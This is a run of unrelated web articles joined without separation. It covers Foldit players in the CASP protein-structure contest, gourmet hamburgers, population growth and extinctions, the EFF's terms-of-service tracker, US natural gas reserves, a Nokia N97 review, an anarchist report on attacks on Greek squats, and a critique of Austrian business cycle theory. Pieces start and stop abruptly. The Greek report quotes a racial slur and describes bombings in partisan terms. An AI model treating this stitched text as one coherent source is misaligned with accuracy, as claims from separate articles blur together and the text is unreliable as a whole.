Players click to move pieces around until they fit .
But the bigger the molecule , the more complex these negotiations become .
And proteins are colossal .
Of course , there is another way to figure all this out :
Shining x-rays through a crystallized lump of protein can help reveal the exact position of its folded - up atoms .
But that takes time — just 50,000 protein structures have been cracked since the late 1950s , while the sequences of millions of protein - coding genes have been discovered in the past 10 years alone .
To make headway in figuring out what all these proteins do , scientists need a faster approach .
So why not just do the math ?
Calculate the energy of all the different ways a given protein can be folded and find the most efficient .
Bang :
You 're done .
But no .
Scientists can only estimate the total energy for a molecule as big as a protein , and that 's not accurate enough to predict its structure .
Even worse , there are more ways to fold a protein than there are atoms in the universe .
It 's like a combination lock with 1,000 dials .
Yet proteins fold themselves into shape in a fraction of a second .
No one knows how .
Early last year , CASP 's organizers hit up laboratories around the world to find proteins whose structures were about to be solved .
From these they compiled a list of more than 120 puzzles , which they started posting on the CASP server in May .
Popović designed an interface for Foldit that renders any protein as a cartoon assemblage of spirals , zigzags , squiggles , and geometric loops .
Every part of the protein is movable — push two sheets together and shimmering connectors ( representing hydrogen bonds ) glue them tight .
Try to fit a loop into a hole that 's too small and red stars flash at the collision sites .
A " wiggle " shakes an entire chunk of the structure to try to get pieces to settle , like dry pasta finding a more compact formation in a jar .
Add a chat window and a score tally and you 've got yourself a game .
The same day Foldit came out , May 8 , 2008 , an article on the game appeared in The Economist .
The ensuing surge of players swamped the server .
Working on test proteins for which Baker already knew the structures , folders quickly started to make friends via the in - game chat channel .
They shared insights and half - finished puzzles ; teams emerged , and collective efforts proved far more successful than any solo folder .
A member of the leading team named Jason Kuznicki ( game handle : Diderot ) set up a wiki that Popović adopted as Foldit 's official manual .
" We even built a mini- Facebook for them , " he says .
The friendly atmosphere drew about 100 new players a day , and the fierce competition among teams — Freedom Folders , Richard Dawkins Foundation , Folders for Obama — pushed everyone to keep improving .
In early June , Baker 's team released five CASP proteins to the Foldit community and crossed their fingers .
Close to midnight on July 28 of last year , Laurent de Jerphanion ( screen name : Dejerpha ) stared in disbelief at the multicolored tangle floating on his computer display .
The 43 - year - old Paris - based marketing manager had been working on puzzle T0461 for several long evenings .
There did n't seem to be any improvement left to be made .
He was cruising to victory .
Then he looked at the scoreboard .
He had been overtaken by a 13 - year - old American named Cheese .
The kid ( real name : Aristides Poehlman ) had just accomplished an astonishing 20 - point jump in a single move — only an hour before the deadline .
But de Jerphanion did n't get to be one of the best Foldit players in the world without grit .
" À nous deux maintenant , " he muttered .
Bring it on .
On the other side of the world , around 7 pm in Virginia , the Poehlman household was in an uproar .
Cheese 's parents were folding , too , on computers upstairs .
Upon her son's great leap forward , Athena , his mother , typed " Wow !
Way to go ! " into the Foldit global chat window .
More encouragement rolled in from the rest of his team — Another Hour , Another Point — scattered worldwide .
But within minutes , de Jerphanion had made more progress on the puzzle and pulled ahead by a point .
It was anyone 's game .
Poehlman 's version of the protein looked good .
Too good , he thought .
No way was he going to make another 20 - point jump .
That had come from a drastic rebuild of a deeply buried amino acid loop — a risky move .
He forced himself to focus on smaller tweaks .
He marked two spots on the backbone and clicked an onscreen button to execute a wiggle followed by a sidechain shake .
The section of amino acids shivered like a wet dog , but his score did n't budge .
Meanwhile , in Paris , de Jerphanion rotated his version of the protein and peered at its innards .
One solid improvement would make him unbeatable .
He grabbed a loop and nudged it into a gap but pushed too hard .
The protein exploded into a Christmas tree of alarms and warning lights , amino acids colliding .
He undid the move .
Poehlman , too , was trying to squeeze out another point .
He spun the protein around and eyed a loop dangling from the end of the largest helix .
In pull mode , he guided it along the protein 's flank and did another wiggle .
The program updated his score .
Poehlman banged out a message to his team : " I just pulled ahead by 1 pt . "
With just a minute to go , Poehlman 's parents came downstairs to find their son pacing back and forth in front of his computer , biting his nails with a mouth full of braces .
He knew that de Jerphanion could snipe him at any moment .
Then the clock ran out .
Poehlman danced and hooted while his three - dimensional protein structure uploaded to Baker 's server .
At 9:40 am an announcement came over the microphone .
" Is anyone from the Baker group here ? "
Three hundred scientists looked around the ballroom .
Outside , a cold December wind blustered under a slate - gray sky , but the Hotel Setar Palace , near Cagliari , Sardinia , was warm — and tense .
As it did every two years , the CASP community had gathered for the results .
The overall scores had just been posted on the Web , and the whole room was beating up the hotel Wi-Fi to get a look .
To determine the tally for each puzzle , CASP judges used a formula that compared the guesses against experimentally measured data .
In the no-holds - barred series , in which competitors can use human brains , computers , and anything else to solve the puzzles , Baker 's team got the highest score in the hardest category , where the puzzles do n't look like any known proteins .
Everyone pretty much expected that .
But the question remained : Had Foldit players contributed any of the winning puzzles ?
Two of Baker 's PhD students , James Thompson and Robert Vernon , groggy from a sleepless night and months of relentless CASP work , finally arrived with the answer .
After a brief wrestle with a laptop , they loaded their results .
Of the 15 Foldit solutions that Baker submitted to CASP , seven had finished in the money — all of them folded by Poehlman and his teammates .
One of their solutions even took first place .
A band of gamer nonscientists had beaten the best biochemists .
Arguably , though , the real Foldit victory had come a few months earlier .
The creators of the game invited the top players to Seattle , seeking their help in making the app better .
Popović contacted Poehlman 's parents .
The kid was shocked .
" Aristides did n't believe us until we showed him the email , " his mother says .
" The silent stare he gave us was priceless . "
Poehlman and his dad , Louis , flew into Seattle late ; they played Foldit for hours in their hotel before going to bed — just like at home .
At UW 's computer lab , Popović and his grad students filmed the Poehlmans playing Foldit and interviewed them about their techniques .
Louis was exacting in his analysis of how he approached each puzzle , supplying sophisticated justifications for his moves .
But when they turned to Cheese and asked him how he knew the way to tweak the proteins — for example , by orienting hydrophobic sidechains toward the protein core — he shrugged and said , " It just looks right . "
And that is exactly what Baker was looking for .
" When I said early on that I hoped Foldit would help me find protein - folding prodigies , it was hopeful speculation , " he says .
" It 's fantastic to see it come true . "
The next CASP is two years away , and Baker does n't want to lose Foldit 's momentum .
He and Popović have given the players a challenge : Design a new protein .
Baker 's lab is developing targets for cancer , AIDS , and Alzheimer 's , and the folders ' task is to build a small protein drug with the right shape and binding properties .
This is n't just an intellectual exercise .
Baker says he will synthesize the most promising structures and test them in his lab .
These proteins could actually have therapeutic value in the real world , outside the game .
And if they do , the Foldit players will share the credit .
It might be the first time that a computer game 's high score is a Nobel Prize .
John Bohannon ( gonzo@aaas.org ) is a correspondent for Science based in Vienna , Austria .
THE simple hamburger is n’t so simple any more .
Over the last decade or so , there has hardly been a serious chef in America who has n’t taken a shot at reinventing or improving it .
They have trained their skills on every element , from the precise grind of beef to the ketchup and pickles .
Some have turned their bakers loose on reformulating the bun .
By most accounts , the burger ’s upward journey began eight years ago , when Daniel Boulud stuffed ground sirloin with truffles , braised short ribs and foie gras at his DB Bistro Moderne in Manhattan .
A few weeks ago , Mr. Boulud brought things full circle , opening a burger bar on the Bowery called DBGB Kitchen and Bar .
While some chefs have groused quietly about the insatiable demand for burgers , most are philosophical .
“ All chefs can be frustrated by the buying public sometimes , ” said Clark Frasier , a chef with restaurants in Massachusetts and Maine .
“ In this economy I ’m happy to sell anything they want to eat . ”
All this high - powered attention has produced some new ways of thinking about and cooking burgers .
Interviews with 30 chefs provided dozens of lessons for the home cook that are n’t terribly difficult and do n’t cost much money .
And it all yielded the ideal burger .
Relevant to an article on which I 'm slowly working , an important new study looking at human population growth and the Quaternary Megafauna Extinction shows our population has grown at the direct expense of other species .
Here 's marine scientist Emmett Duffy 's summary and discussion of the study .
And Here 's the study .
We must be cautious though in interpreting these data .
They do not mean pre-agricultural people were causing extinctions at rates resembling those we 're seeing today .
In fact , the evidence is clear that for nearly all of human history prior to agriculture , hunting - gathering ways of living came much , much closer than today 's society to true sustainability -- in part because population sizes were so much smaller .
( Evidence suggests , in fact , that many hunting - gathering societies made efforts to hold their populations to within ecological limits . [ 1 ] )
As mentioned in the article , species extinction rates were modest until not long before the advent of agriculture when the growth of the human population began to accelerate .
But once the size of the human population began to take off there began a pronounced impact on large vertebrates , exacerbated , in some instances , by a changing climate .
The subsequent shift to agriculture followed by industrialization and consequent massive increases in the human population have made matters far worse with a much wider array of species now affected .
We are in the midst of the Sixth Mass Extinction in Earth 's history , marked at its start by the Quaternary extinction event but having accelerated enormously in recent history .
This work adds well to that of anthropologist Jeffrey McKee and colleagues who found that after " species richness " human population was the single best predictor of the number of threatened species in a country .
Here 's Jeffrey 's book elaborating on their work :
Sparing Nature : The Conflict Between Human Population Growth and Earth's Biodiversity
Here 's the original study ( PDF ) :
http://www.johnfeeney.net/storage/documents/McKee_2003_BiolConserv.pdf
I believe the Sixth Extinction is the most unjustifiably underreported issue in the ecological crisis .
It 's potential consequences are as severe as those of climate change , perhaps more so .
( Of course the two overlap , but the Sixth Extinction would still be occurring in the absence of climate change . )
And importantly , its link to the size and growth of the human population is direct and fundamental .
Most Internet users read
Web site terms of service agreements about as often than they peruse car owner 's manuals , which is to say only when it smells like something is burning .
Yet ToS changes happen all the time , those changes are often important , and , they can cause a stink , as Facebook and its faithful learned recently when the company proposed alterations to its terms that were perceived as Facebook helping itself to the pictures and writings of members .
Much complaining and backpedaling ensued before order was restored .
In an effort that may actually accelerate such flare - ups in the future , the Electronic Frontier Foundation today announced that it has begun tracking ToS changes and making those findings available on a special Web site .
From the EFF press release :
" Terms of Service " policies on websites define how Internet businesses interact with you and use your personal information .
But most web users do n't read these policies -- or understand that the terms are constantly changing .
To track these ever - evolving documents , the Electronic Frontier Foundation ( EFF ) is launching " TOSBack " : a " terms of service " tracker for Facebook , Google , eBay , and other major websites .
At www.TOSBack.org, you can see a real - time feed of changes and updates to more than three dozen polices from the Internet 's most popular online services .
Clicking on an update brings you to a side - by - side before - and - after comparison , highlighting what has been removed from the policy and what has been added .
The EFF service has just begun adding baseline ToS documents -- 44 sites so far -- and identifying initial changes .
Some of the changes would appear to be trivial , such as this one from Facebook that apparently notes nothing but a change in contact information ( and who uses snail - mail addresses anymore ? ) .
But others are clearly more meaningful , such as this one flagged from the ToS of domain name registrar GoDaddy.com , adding the language : " You acknowledge and agree a copy of the customer contact data
You provide will be used as the initial domain contact data and made public in the WHOIS database . "
And this from eBay that adds several paragraphs of new verbiage covering a buyer 's obligations when alleging receipt of a fraudulent item .
The site 's homepage includes a " highlighted policies " box , which presumably will help pull some of the nuggets from what promises to quickly become an avalanche of change notices .
Here 's the RSS feed .
As for the technology behind the site : " TOSBack is powered by PHP / MySQL .
The code is open - source - We 'll be posting a tarball of it here shortly .
Special thanks to the developers of PHPWiki and Drupal , whose diff engine was gratefully adapted for use in TOSBack . "
It will be interesting to see if the site proves useful ... or just gets tucked back into the glove compartment .
Those who never quite outgrew their Hot Wheels collection can choose from the vehicles such as " The Road Agent " ; a unique and downright futuristic custom creation from the fertile mind of one of America 's most creative and colorful customisers Ed " Big Daddy " Roth ...
Credit : BARCROFT MEDIA
You may have seen the recent news that a report by the Potential Gas Committee says natural gas reserves in 2008 rose to 2,074 trillion cubic feet .
The New York Times and the Wall Street Journal ( via Rigzone ) both had stories on it , and T. Boone Pickens issued a press release .
In this post , I will look at how long these reserves might last , if used to replace US gasoline usage .
First , from the New York Times :
Estimate Places Natural Gas Reserves 35 % Higher
Thanks to new drilling technologies that are unlocking substantial amounts of natural gas from shale rocks , the nation ’s estimated gas reserves have surged by 35 percent , according to a study due for release on Thursday .
Estimated natural gas reserves rose to 2,074 trillion cubic feet in 2008 , from 1,532 trillion cubic feet in 2006 , when the last report was issued .
This includes the proven reserves compiled by the Energy Department of 237 trillion cubic feet , as well as the sum of the nation ’s probable , possible and speculative reserves .
The new estimates show “ an exceptionally strong and optimistic gas supply picture for the nation , ” according to a summary of the report , which is issued every two years by a group of academics and industry experts that is supported by the Colorado School of Mines .
The Wall Street Journal wrote :
US Has Almost 100 - Year Supply of Natural Gas
The amount of natural gas available for production in the United States has soared 58 % in the past four years , driven by a drilling boom and the discovery of huge new gas fields in Texas , Louisiana and Pennsylvania , a new study says .
... the Potential Gas Committee 's study was prepared by industry geologists who analyzed individual gas fields using seismic imagery and production data provided by gas producers .
The surge in gas resources is the result of a five - year - long drilling boom spurred by high natural - gas prices , easy credit and new technologies that allowed companies to produce gas from a dense kind of rock known as shale .
The first big shale formation to be discovered , the Barnett Shale near Fort Worth , Texas , is now the country 's top - producing gas field , and companies have made other huge discoveries in Arkansas , Louisiana and Pennsylvania .
Together , the shale fields account for roughly a third of U.S. gas resources , according to the Potential Gas Committee .
Pickens had this to say :
T. Boone Pickens Statement on Surge in Estimated Natural Gas Reserves
Today ’s report substantiates what I ’ve been saying for years : there ’s plenty of natural gas in the U.S.
I launched the Pickens Plan a year ago to help reduce our dangerous dependence on foreign oil , and using our abundant supply of natural gas as a transition fuel for fleet vehicles and heavy - duty trucks is a key element of that plan .
On the same day this report is going out , diesel prices are again on the rise , squeezing the trucking industry .
Now more than ever we need to take action to enact energy reform that will immediately reduce oil imports .
The 2,074 trillion cubic feet of domestic natural gas reserves cited in the study is the equivalent of nearly 350 billion barrels of oil , about the same as Saudi Arabia ’s oil reserves .
A number of people have rightly pointed out that a 100 - year supply implies usage at current rates .
But it got me to thinking about how much natural gas it would take to displace all U.S. gasoline consumption .
So in the spirit of my year - ago essay Replacing Gasoline with Solar Power , I will do the same calculation for replacing gasoline with natural gas .
The big difference between this calculation and the earlier one is that solar power still has some technical issues to resolve ( e.g. , storage ) and electric vehicles are not yet ready for prime time .
On the other hand we are perfectly capable , today , of displacing large numbers of gasoline - fueled vehicles with natural gas .
How Much Do We Need ?
The U.S. currently consumes 390 million gallons of gasoline per day .
( Source : EIA ) .
A gallon of gasoline contains about 115,000 BTUs .
( Source : EPA ) .
The energy content of this much gasoline is equivalent to 45 trillion BTUs per day .
The energy content of natural gas is about 1,000 BTUs per standard cubic foot ( scf ) .
Therefore , to replace all gasoline consumption would require 45 billion scf per day , or 16.4 trillion scf per year .
Current U.S. natural gas consumption is 23 trillion scf per year ( Source : EIA ) .
Therefore , replacing all gasoline consumption with natural gas would require a total usage of 39.4 trillion scf per year , an increase in natural gas consumption of 71 % over present usage .
Assuming for the sake of argument that the 2,074 trillion standard cubic feet cited in the study is accurate , that the " probable , possible and speculative reserves " eventually equate to actual reserves , and that the gas is economically recoverable , that is enough gas for 53 years of combined current natural gas consumption and gasoline consumption .
If you assume that only the proven plus probable reserves are eventually recovered , the amount drops to about 1/3rd of the 2,074 trillion scf estimate , still enough to satisfy current natural gas consumption and replace all gasoline consumption for almost 20 years .
We can also calculate in terms of oil imports .
Right now the U.S. imports about 13 million barrels per day of all petroleum products .
A barrel of oil contains around 5.8 million BTUs , but oil only makes up 10 million of the 13 million barrel per day figure .
Other imports include things like gasoline ( 4.8 million BTUs / bbl ) and ethanol ( 3.2 million BTUs / bbl ) .
Scanning the list of imports , I probably wo n't be too far off the mark to presume that the average BTU value of those 13 million bpd of imports is about 5.4 million BTUs / bbl .
On an annual basis , this equates to 25.6 trillion scf of natural gas , which would be an increase over current natural gas usage of 111 % .
Going back to the 2,074 trillion scf from the study , this would be enough to displace imports of all petroleum products ( again , at current usage rates and not factoring in declining U.S. oil production ) for 43 years .
What 's the Cost ?
Natural gas is presently trading at about $ 4 per million ( MM ) BTU ( although December 2009 is trading at almost $ 6 ) .
Oil is presently trading at $ 71 / bbl , which equates to $ 12.24 / MMBTU .
Gasoline is presently trading at over $ 17/ MMBTU .
Thus , natural gas is a bargain relative to oil or gasoline .
Incidentally , I just checked on seasoned wood and wood pellets , and they range from $ 8 -$ 12 / MMBTUs .
So it is cheaper to heat your house with gas than with wood .
I am not sure I would have guessed that .
While natural gas is a bargain relative to gasoline , converting a gasoline - powered vehicle to natural gas is n't cheap .
According to this source , it can cost $ 12,500 to $ 22,500 to convert a gasoline - powered car to natural gas .
Honda makes a compressed natural gas ( CNG ) vehicle , but according to this review in Car and Driver the premium over the gasoline version is $ 8,780 .
A person would need to drive an awful lot to justify that premium .
However , that 's what fleets do .
They drive a lot .
The large price differential explains why fleets would be interested in running their vehicles on natural gas .
Conclusions
So , the good news is that the United States could be energy independent if the newly released natural gas reserve numbers are remotely accurate .
It also appears that we have enough natural gas available that civilization is n't going to end any time soon due to lack of energy supplies .
There are three caveats .
First , energy independence via natural gas could require us to spend significantly more for personal automotive transportation .
Second , " possible " reserves may never materialize .
Finally , a large chunk of the calculated reserves are based on shale gas , and that requires gas to be in the $ 6 - $ 8 / million BTU range to be economical .
Still , it is a bargain compared to gasoline , and it explains why fleets are more receptive to conversion to natural gas than the general public is likely to be for their personal vehicles .
Afterword
After posting this post on my personal blog ( R Squared Energy Blog ) , I received the following e-mail from Marc J. Rauch , Exec .
Vice President / Co-Publisher of The Auto Channel , explaining why converting a gasoline powered vehicle is so expensive .
I ’ve been using the Nokia N97 for more than a week now .
Those who live under the rock should know it ’s the Finnish giant ’s flagship device for this year , but just how powerful it is – is a different story .
In this first article I ’ll try to emphasize its top 5 pros and cons .
Let ’s roll …
Top 5 pros :
Great form factor – I always dreamed of having a QWERTY keyboard equipped NSeries device .
Adding a touchscreen in the equation made things even better .
Solid camera – I consider N97 ’s competition to be such phones as the HTC Touch Pro and some other Windows Mobile devices with the same form factor .
The camera that ’s in the N97 leaves the competition far behind thanks to its Carl Zeiss optics .
Customizable home screen – at the moment I have my top 4 contacts , top 8 apps , calendar and the current weather information on the N97’s homescreen .
All of that is easily accessible with a single press of a screen .
Multimedia – NSeries was always strong on multimedia .
Apple fan boys are all proud that the iPhone 3GS can take 640×480 video at 30 fps ; NSeries device could do that for more than 3 years now , starting with the Nokia N93 .
Good selection of pre-installed apps – virtually everything you could possibly need comes pre-installed with the device — including mobile office suite ( QuickOffice ) , navigation app ( Nokia Maps ) , browser , and so on .
Some things are missing , but that ’s in the cons list .
The cons continue after the jump …
Top 5 cons :
Keyboard – you ’ve probably heard this before , but unfortunately , it ’s worth repeating .
The keyboard is awful , and it ’s not just because dot and comma share the same key , it ’s also the fact that the shift is located in the same part ( left ) as the D - pad , which BTW I love , making text selection pretty hard , to say the least .
I do n’t understand why some lower - end devices like the E75 have better keyboards than the company ’s flagship phone .
Camera – as you can see this is both in my top pros and cons .
Do n’t get me wrong , I think 5 megapixel camera is enough .
But when you think about it , the N95 which was Nokia ’s flagship device for 2007 had a camera with same megapixel count .
Go figure .
Slowness – CPU can’t handle the job properly .
I wish things are moving faster , but they are not .
Actually , I ’m not sure whether it ’s CPU thing or lack of RAM ( there are 128 MB of RAM in the N97 ) , but some things need to change .
When I press some button or change the screen orientation , the phone should react immediately .
UI / Symbian – although I like the homescreen , UI is everything but intuitive .
It ’s the small things that annoy me .
For some things a single press of an icon is enough , whereas for some others you need to press two times .
In addition , when I connect on the WiFi network , I do n’t want to be asked on and on about which network should an application use .
Ovi Store – this is n’t exactly a bad thing of the N97 per se , but it ’s related , nonetheless .
For one thing , when I want to customize the homescreen and I click on “ Download content , ” Ovi Store should show me only those apps which come with homescreen widget .
Moreover , Facebook should come pre-installed with the device and the same goes for some weather information application , which comes with a homescreen widget — these , at least , have n’t come pre-installed on the N97 I got .
UPDATE : Facebook app comes pre-installed on the Nokia N97 , it just was n’t there on the one I got !
That ’s about all I had to say for this post .
I ’ll leave my final judgment for the final article .
Stay tuned in the meantime …
Fascists attack two Salonica squats while struggle against anti-immigration policies intensifies .
During the past week both Radio Revolt , a pirate anarchist radio station housed in an abandoned train wagon within premises of the Aristotelian University of Salonica , and Europe ’s largest squat , Fabrica Yfanet , came under fascist arson attack .
The train wagon of Radio Revolt , was attacked with three Molotov cocktails in the night of Tuesday 21/07 by parastate fascist elements publicly condoned by the Ministry of Public Order currently run by an ex-junta persecutor .
Radio Revolt continued to broadcast with only 3 hours stoppage .
On Saturday 25/07 Fabrica
Yfanet ’s main gate was attacked by a gas - canister device .
The fire was extinguished by member soft hw squat as well as neighbours , while police forces that unusually arrived to the scene only minutes after the attack engaged squatters and neighbours in fascist verbal abuse clearly sympathising with the attack .
Fabrica Yfanet is a centre of manifold political activities and receives widespread support amongst the city ’s youth and progressives .
Meanwhile in Athens , on the early morning of Tuesday 28/7 , a squad of Golden Dawn members marched from the offices of the neonazi party near Omonoia square down Menandrou street in military formation , attacked black men and women uninhibited by the strong police presence in the area .
The nazi scum chanted “ today niggers die ” while returning to their Agios Panteleimonas lair .
Arson attacks against anarchist antiauthoritarian and libertarian squats have been a repeated pattern in the last year , and is considered to be part of the Greek state ’s massive counterinsurgency efforts to quench the rising social movement against the more and more dictatorial rule of the government which has been manning its civil service with ever more junta - related individuals .
Parastate elements ’ anti-squat activity has repeatedly led to massive solidarity marches , rendering the strategy rather counterintuitive , proving once again the readiness of the Greek state to exercise brute force , and its inability to reason even to its own interest .
Characteristic of the new blind fascism of the Greek state is the unprecedented act of censorship exercised against a short animated film by the well known leftist director Costa - Gavras , who is a nail in the eye of the Greek PM for having filmed “ Z ” , the story of the assassination of left - wing MP Grigoris Lambrakis by parastate thugs under orders of the PM ’s uncle in the mid 1960s .
Gavras ’ animation commissioned by the Ministry of Culture was meant to play at the new Acropolis museum , until the Ministry obliged to curtail scenes portraying Greek Orthodox priests vandalising the Parthenon after orders by the Church .
Costa - Gavras has condemned the act as a return to the darkest days of the country .
The Greek Orthodox Church remains the largest land - owner in the country and an integral part of the State mechanism , waging considerable control in many policies , particularly relating to education .
Despite the rising white - terror and the mid-summer vacations , the social antagonistic movement is stepping up its response to the state - fascist collaboration and racist bigotry .
Since Friday 24/07/09 a series of blockades of boats transferring immigrants to detention camps in the Greek province of Macedonia have erupted in battles between antiracist protesters and the police .
On Friday 24/07 at midnight protesters cancelled the transfer of 60 so - called illegal immigrants on the boat Theofilos from the port of Mytilini , Lesbos Island , to the mainland city of Kavala .
The protesters occupied the main entrance of the ferry boat refusing to allow the police to load the arrested immigrants of Pakistani Afghan and Somalian descent .
An unverified number of detained immigrants at the Panagi camp of Lasbos have started a hunger strike against the transfers , demanding their immediate release .
On Sunday 26/07 protesters of PAME , the umbrella union controlled by the Communist Party ( KKE ) , and of the Chios Immigrant Solidarity Committee clashed with the police and fascist civilian auxiliaries at the port of Chios Island when they tried to blockade the entry of two busloads of detained immigrants on the aforementioned boat bound for Thessaloniki .
After the police beat the protesters back with use of brutal force , a member of the KKE partaking in the blockade fell into to sea between the pier and the ferry , disallowing the departure of the boat for another hour .
The involvement of the KKE in the protests marks an interesting if controversial shift in its long - standing policy of verbalism and practical apathy to the plight of immigrant workers .
During the clashes many protesters were injured , while according to the Solidarity Committee , the criminal and dehumanising attitude of the Chios authorities towards immigrants reached its apex in the separation of a 15 year old boy from Somalia from his mother who remains detained in the island .
The detained immigrants were transferred to the mainland chained and locked in the boat ’s basement inside the buses , thus directly endangering their lives .
The authorities claim the reason for the transfers is the overpopulation of the islands ’ camps .
In Chios , the Mersinidi camp has a capacity of 120 while detaining 220 , whereas the Panagi camp in Lesbos has a capacity of 250 persons while detaining 400 .
Protesters however argue that the transfers are a first step of “ pushing ” immigrants illegally though the minefields of Evros River towards Turkey .
Claiming that the camps are dehumanising and that the transfers comprise punishing measures for people who have never been convicted for anything other than not having papers , the protesters demand that the detainees are held in hotels , after releasing all underage individuals .
In the diffuse - guerrilla front , a bomb device targeting the Chilean Consulate was dismantled last week by the police , while Tuesday night saw within 30 minutes a barrage of low intensity attacks on State targets , with some 7 local offices of anti-immigration parliamentary parties ( New Democracy , PASOK , and LAOS ) bombed with gas - canister devices across Athens .
Responsibility for the attacks has been claimed by the Shining Paths of Solidarity in response to the “ nazification ” of the State and nazi- police collaboration .
The offices of a LAOS MP were also attacked , causing no human injuries .
I ’ve long promised a post on Austrian Business Cycle Theory , and here it is .
For those who would rather get straight to the conclusion , it ’s one I share in broad terms with most of the mainstream economists who ’ve looked at the theory , from Tyler Cowen , Bryan Caplan
and Gordon Tullock at the libertarian / Chicago end of the spectrum to Keynesians like Paul Krugman and Brad DeLong .
To sum up , although the Austrian School was at the forefront of business cycle theory in the 1920s , it has n’t developed in any positive way since then .
The central idea of the credit cycle is an important one , particularly as it applies to the business cycle in the presence of a largely unregulated financial system .
But the Austrians balked at the interventionist implications of their own position , and failed to engage seriously with Keynesian ideas .
The result ( like orthodox Marxism ) is a research program that was active and progressive a century or so ago but has now become an ossified dogma .
Like all such dogmatic orthodoxies , it provides believers with the illusion of a complete explanation but cease to respond in a progressive way to empirical violations of its predictions or to theoretical objections .
To the extent that anything positive remains , it is likely to be developed by non-Austrians such as the post - Keynesian followers of Hyman Minsky .
Update
There ’s a fascinating discussion linking to this post here .
In French , but clear and simply written .
Anyone with high school French and a familiarity with the issues should be able to follow the main points .
First , some history and data .
Austrian Business Cycle
Theory was developed in the first quarter of the 20th century , mostly by Mises and Hayek , with some later contributions by Schumpeter .
The data Mises and Hayek had to work on was that of that of the business cycle that emerged with industrial capitalism at the beginning of the 19th century and continued with varying amplitude throughout that century .
In particular , it ’s important to note that the business cycle they tried to explain predated both central banking in the modern sense of the term and the 20th century growth of the state .
The case of the US is of particular interest since the business cycle coincided with a wide range of monetary and banking systems : from national bank to free banking , and including a gold standard , bimetallism and non-convertible paper money .
This NBER data goes back to 1857 , but there was nothing new about the business cycle then ( Marx , for example , had been writing about it for a decade or more ) .
The US experienced serious “ panics ” , as they were then called in 1796 - 97 , 1819 and 1837 [ 1 ] as well as milder fluctuations associated with the British crises of the 1820s and 1840s .
The typical crisis of the 19th century , like the current crisis , began with bank failures caused by the sudden burst of a speculative boom and then spread to the real economy , with the contraction phase typically lasting from one to five years .
By contrast , recessions since 1945 have generally lasted less than a year , and have mostly been produced by real shocks or by contractionary monetary and fiscal policy .
According to the theory , the business cycle unfolds in the following way .
The money supply expands either because of an inflow of gold , printing of fiat money or financial innovations that increase the ratio of the effective money supply to the monetary base .
The result is lower interest rates .
Low interest rates tend to stimulate borrowing from the banking system .
This in turn leads to an unsustainable boom during which the artificially stimulated borrowing seeks out diminishing investment opportunities .
This boom results in widespread malinvestments , causing capital resources to be misallocated into areas that would not attract investment if price signals were not distorted .
A correction or credit crunch occurs when credit creation cannot be sustained .
Markets finally clear , causing resources to be reallocated back towards more efficient uses .
At the time it was put forward , the Mises - Hayek business cycle theory was actually a pretty big theoretical advance .
The main competitors were the orthodox defenders of Says Law , who denied that a business cycle was possible ( unemployment being attributed to unions or government - imposed minumum wages ) , and the Marxists who offered a model of catastrophic crisis driven by the declining rate of profit .
Both Marxism and classical economics were characterized by the assumption that money is neutral , a ‘ veil ’ over real transactions .
On the classical theory , if the quantity of money suddenly doubled , with no change in the real productive capacity of the economy , prices and wages would rise rapidly .
Once the price level had doubled the previous equilibrium would be restored .
Says Law ( every offer to supply a good service implies a demand to buy some other good or service ) which is obviously true in a barter economy , was assumed to hold also for a money economy , and therefore to ensure that equilibrium involved full employment
The Austrians were the first to offer a good reason for the non-neutrality of money .
Expansion of the money supply will lower ( short - term ) interest rates and therefore make investments more attractive .
There ’s an obvious implication about the ( sub ) optimality of market outcomes here , though more obvious to a generation of economists for whom arguments about rational expectations are second nature than it was 100 years ago .
If investors correctly anticipate that a decline in interest rates will be temporary , they wo n’t evaluate long - term investments on the basis of current rates .
So , the Austrian story requires either a failure of rational expectations , or a capital market failure that means that individuals rationally choose to make ‘ bad ’ investments on the assumption that someone else will bear the cost .
And if either of these conditions apply , there ’s no reason to think that market outcomes will be optimal in general .
A closely related point is that , unless Say ’s Law is violated , the Austrian model implies that consumption should be negatively correlated with investment over the business cycle , whereas in fact the opposite is true .
To the extent that booms are driven by mistaken beliefs that investments have become more profitable , they are typically characterized by high , not low , consumption .
Finally , the Austrian theory did n’t say much about labour markets , but for most people , unemployment is what makes the business cycle such a problem .
It was left to Keynes to produce a theory of how the non-neutrality of money could produce sustained unemployment .
The credit cycle idea can easily be combined with a Keynesian account of under - employment equilibrium , and even more easily with the Keynesian idea of ‘ animal spirits ’ .
This was done most prominently by Minsky , and the animsal spirits idea has recently revived by Akerlof and Shiller .
I suspect that the macroeconomic model that emerges from the current crisis will have a recognisably Austrian flavour ..
Unfortunately , having put taken the first steps in the direction of a serious theory of the business cycle , Hayek and Mises spent the rest of their lives running hard in the opposite direction .
As Laidler observes , they took a nihilistic ‘ liquidationist ’ view in the Great Depression , a position that is not entailed by the theory , but reflects an a priori commitment to laissez - faire .
The result was that Hayek lost support even from initial sympathisers like Dennis Robertson .
And this mistake has hardened into dogma in the hands of their successors .
The modern Austrian school has tried to argue that the business cycle they describe is caused in some way by government policy , though the choice of policy varies from Austrian to Austrian – some blame paper money and want a gold standard , others blame central banks , some want a strict prohibition on fractional reserve banking while others favour a laissez - faire policy of free banking , where anyone who wants can print money and others still ( Hayek for example ) a system of competing currencies .
Rothbard ( who seems to be the most popular exponent these days ) blames central banking for the existence of the business cycle , which is somewhat problematic , since the business cycle predates central banking .
In fact , central banking in its modern form was introduced in an attempt to stabilise the business cycle .
The US Federal Reserve was only established in 1913 , after Mises had published his analysis .
Rothbard gets around this by defining central banking to cover almost any kind of bank that has some sort of government endorsement , such as the ( private ) Bank of England in the 19th century , and arguing for a system of free banking that would avoid , he asserts , these problems .
But , on any plausible definition of the term , the US had free banking from the Jackson Administration to the Civil War and that did n’t stop the business cycle ( Rothbard offers some historical revisionism to argue that the Panic of 1837 did n’t really happen , but that was n’t what US voters thought when they threw the Jacksonians out in 1840 ) .
And free banking in late 19th century Australia ( our first quasi- central bank was the Commonwealth Bank established in 1915 ) did n’t prevent a huge boom and subsequent long depression around 1890 .
Overall , the US was much closer to free banking throughout the 19th century than in the period from 1945 until the development of the largely unregulated ‘ shadow banking ’ system in the 1990s , but the business cycle was worse then ( how much worse is a matter of some controversy , but no serious economist claims it was better ) .
To sum up , the version of the Austrian Business Cycle Theory originally developed by Hayek and Mises gives strong reasons to think that an unregulated financial system will be prone to booms and busts and that this will be true for a wide range of monetary systems , particularly including gold standard systems .
But that is only part of what is needed for a complete account of the business cycle , and the theory can only be made coherent with a broadly Keynesian model of equilibrium unemployment .
